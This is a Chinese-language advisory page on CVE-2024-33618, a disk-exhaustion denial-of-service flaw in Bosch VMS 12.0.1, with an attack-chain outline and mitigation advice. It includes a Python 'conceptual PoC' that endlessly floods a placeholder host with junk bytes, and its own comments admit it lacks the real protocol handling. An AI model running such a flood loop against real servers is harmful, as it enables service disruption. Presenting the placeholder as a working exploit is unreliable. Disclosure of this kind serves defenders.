CVE-2024-33618 CVSS 7.5 高危

CVE-2024-33618 Bosch VMS资源耗尽漏洞

披露日期: 2026-04-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2024-33618

漏洞类型

资源耗尽

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Bosch VMS (Video Management System)

漏洞概述

Bosch VMS Central Server组件中存在未控制的资源消耗漏洞。该漏洞影响Bosch VMS 12.0.1版本。由于缺乏对网络接口输入数据的适当限制，未经身份验证的远程攻击者可以通过发送特制的数据包，触发服务器写入大量数据，从而耗尽系统磁盘空间。这会导致系统日志或存储分区被填满，最终使服务不可用，造成拒绝服务攻击。

技术细节

该漏洞的根源在于Bosch VMS Central Server在处理网络接口传入的数据时，未实施足够的资源限制和验证机制。具体而言，攻击者可以利用网络接口向服务器发送特定的恶意请求或数据流。服务器在处理这些请求时，可能会将数据错误地或无限制地记录到磁盘存储中（例如日志文件或临时文件），而没有对写入量进行合理的阈值检查。由于无需用户交互且无需身份验证，远程攻击者可轻易利用此漏洞。通过持续发送此类数据，攻击者能够迅速占用服务器上的可用磁盘空间。一旦磁盘空间被耗尽，系统将无法写入新的日志、缓存或运行时数据，导致关键服务崩溃或停止响应，从而实现拒绝服务攻击。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出运行Bosch VMS 12.0.1版本的目标服务器及其开放的网络接口端口。

STEP 2

利用

攻击者向目标服务器的网络接口发送特制的数据包序列，无需任何身份验证即可触发漏洞。

STEP 3

资源消耗

服务器处理恶意请求，将数据不断写入磁盘，且未进行有效的大小限制，导致磁盘可用空间迅速减少。

STEP 4

拒绝服务

磁盘空间耗尽，系统无法继续写入日志或运行时数据，导致Central Server服务崩溃或停止响应，影响视频监控等业务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Conceptual Proof of Concept for CVE-2024-33618
# This script attempts to trigger disk space exhaustion by sending data.
# Note: The actual exploit requires specific protocol handling found in Metasploit.

TARGET_IP = "192.168.1.100" # Replace with target IP
TARGET_PORT = 8080          # Replace with target port

def send_exploit_payload():
    try:
        while True:
            # Create a socket connection
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((TARGET_IP, TARGET_PORT))
            
            # Craft a payload that triggers excessive logging/storage
            # Adjust payload based on actual protocol reverse engineering
            payload = b"A" * 10000 
            
            s.send(payload)
            print(f"Payload sent to {TARGET_IP}:{TARGET_PORT}")
            s.close()
            
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    send_exploit_payload()

影响范围

Bosch VMS 12.0.1

防御指南

临时缓解措施

建议立即联系博世支持获取并安装修复补丁。在补丁部署前，应严格限制对受影响系统的网络访问，利用防火墙规则阻断非受信任IP的连接，并密切监控系统磁盘使用情况，一旦发现异常增长应及时介入处理。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表